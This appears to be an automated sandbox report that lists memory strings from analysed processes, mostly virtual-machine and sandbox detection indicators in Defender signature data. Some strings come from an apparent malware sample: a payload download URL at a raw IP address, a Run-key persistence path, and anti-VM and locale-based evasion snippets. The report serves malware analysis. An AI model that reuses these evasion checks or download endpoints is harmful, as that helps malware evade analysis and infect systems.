Source: MpSigStub.exe, 00000026.00000003.18324900169.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: lbum.exeticket.zipuspsdhlspchPo.php?www=/release/setup.zipexe/release/install./release/new/setup.rar/index.php?c=RaE.scr.pdf..php?receipt_print=.php?receipt=/facebook//info.php?info=/info.php?label=/main.php?label=/main.php?info=/info.php?id=/flash/?/?d=/d/install.exe/index.php?key=.php?id=aJT.php?htm/setup.RPF:FakePAVURLinstall.SIGATTR:LoadsObscureDllRPF:LowFiObscureDllReadRPF:LowFiObfuscatorVM!Themida!CodeVirtualizer!Armadillo!Armadillo_4!Armadillo_5xRPF:DetectsVmWareRPF:DetectsVPCRPF:DetectsVMHSTR:VirTool:Win32/Obfuscator.YVSIGATTR:VirTool:Win32/Obfuscator.YV.2HSTR:Rogue:Win32/FakePAV_lowfiPEBMPAT:Trojan:Win32/Tibs_lowfiHSTR:Rogue:Win32/FakePAV_2_lowfiHSTR:Rogue:Win32/FakePAV_3_lowfianajbio.exesyuy2.exe~!#RPF:KaraganyFilename.BRPF:KaraganyFilename.A\AppData\Roaming\\Application Data\tfn.tmp.exeRPF:SkuffbotFilename.Asvchosts.exeRPF:SkuffbotFilename.BRPF:SkuffbotFilename.C.ps1.vbscod.gpj.gnp.txt.ftr.tpp.piz.rar.slx.fdp.RPF:RLOUnknownExtensionFilenameRPF:RLOFilenameRPF:RLOUnknownExtensionFilenameType1client.dllClient.dllclient_p.dllclient32_p.dllclient64_p.dlld64_p.dllmain_dll.dllinst_dll.dllVncDLL.dllRPF:CarberpVncDLLRPF:VawtrakDLLRPF:UrsnifDLLRPF:SampleCollectRPF:ObfuscatorWU.pif.scrIMG_FacebookRPF:PEWithImageFilename.Askype-imgprofile-imgprofile-facebookimg-facebookImages-Facebookimage-facebookDCIM-IMGSkype.ImageImage.Skypeskype_profilefileqemurecodispljrcgdwgpixbmpRPF:PEWithImageFilename.Bjpgimgapi_irispngr.out.png.exer.in.png.exe.pdfPrologue.Web.PDF.exeRPF:PEWithDocFilename.A.doc.xls.ppt.htmjpegdocxxlsxpptx.html.JPG.zip\RPF:PEWithImageFilename.C%s%s%sRPF:Napolar_Section_NameRPF:SirefefInstallationPathEPaEPbEPd.virus@h
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	Binary or memory string: IsVmWare
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .AVHD.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .RCT.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: dynmem_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: =8*\|%systemroot%\System32\Vmcompute.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp	Binary or memory string: \vmnet.exe
Source: MpSigStub.exe, 00000026.00000003.18324900169.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=\COCKFIGHT.exe\FLGEBREVSoftware\Microsoft\Windows\CurrentVersion\RunPERAMELINEhttp://178.32.63.50/mvbs/Host_hKVPgVgQ234.binhttp://178.32.63.50/bvbs/Host_hKVPgVgQ234.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: MpSigStub.exe, 00000026.00000003.18305766772.00000138BD36A000.00000004.00000001.sdmp	Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: %qemu
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .HRL.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: .VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: ,Administrator,Guest,vmware
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18305766772.00000138BD36A000.00000004.00000001.sdmp	Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VMCX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.txt.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: vboxservice
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: PSF1.00123456789ABCDEF0123456789abcdefpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_disable_apicall_limitpea_kernel_scanpea_uses_single_steppingpea_uses_breakpointspea_uses_privinstrpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_access_violationpea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_vsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_genpackedpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_access_violationpea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesiz
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.xml.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp	Binary or memory string: unsubscribe vmnet notification
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: \\.\VBoxMiniRdrDN
Source: ieinstal.exe, 0000000D.00000002.19666460242.00000000031C9000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: Anti Sandboxie/VMware
Source: AZTEKERNES.exe, 00000005.00000002.15127289168.0000000002BD0000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmms.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: FA*.\|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.img.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	Binary or memory string: sandboxvmware]
Source: ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .ISO.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: *.\|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: VMwareVMware
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: vboxmrxnp.dll
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VSV.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmms.exe\|Microsoft-Hyper-V
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: %vmware
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: 3.%ProgramFiles%\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	Binary or memory string: if(((get-uiculture).name-match"ru\|ua\|by\|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox\|vmware\|kvm")){exit;}
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.xml.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: vmGuestLib.dll
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: vmware.exe\|
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	Binary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp	Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: vmware-authd.exe
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	Binary or memory string: *.log.\|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-aarch64.exe
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *.BIN.\|%SYSTEMPROCESS%\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: VMWare
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: >Host: virtualmachine-update.com
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .vhds.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.rom.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18305766772.00000138BD36A000.00000004.00000001.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *.BIN.\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: Systeminfo \| findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .)*.BIN.\|%SYSTEMPROCESS%\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: VBoxService
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.rom.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp	Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.toc.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .vhdpmem.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: idKasperkyVPCVMWareSandboxieHiJackThisgetDevicesRC4
Source: AZTEKERNES.exe, 00000005.00000002.15127289168.0000000002BD0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\msvbvm60.dll
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: \\vmware-host:Y
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	Binary or memory string: Vmware
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VHD.\|\|Microsoft-Hyper-V
Source: ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.bin.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.img.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VHDX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: DetectVirtualMachine
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: (AntiVirtualPCAntiVirtualBoxAntiVmWare]
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	Binary or memory string: VmWareMachine
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	Binary or memory string: 2-*.log.\|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: *.\|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VMRS.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmsp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: pUnix file descriptiontargetjob\\vmware-host:Y DomainBigSpace resultiitem]
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: MpSigStub.exe, 00000026.00000003.18347020004.00000138BDD25000.00000004.00000001.sdmp	Binary or memory string: virtual hd
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: qemu-ga.exe
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	Binary or memory string: VMWARE": IsVirtualPCPresent
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmcompute.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .vmgs.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	Binary or memory string: IsVmWare]
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmsp.exe\|Microsoft-Hyper-V
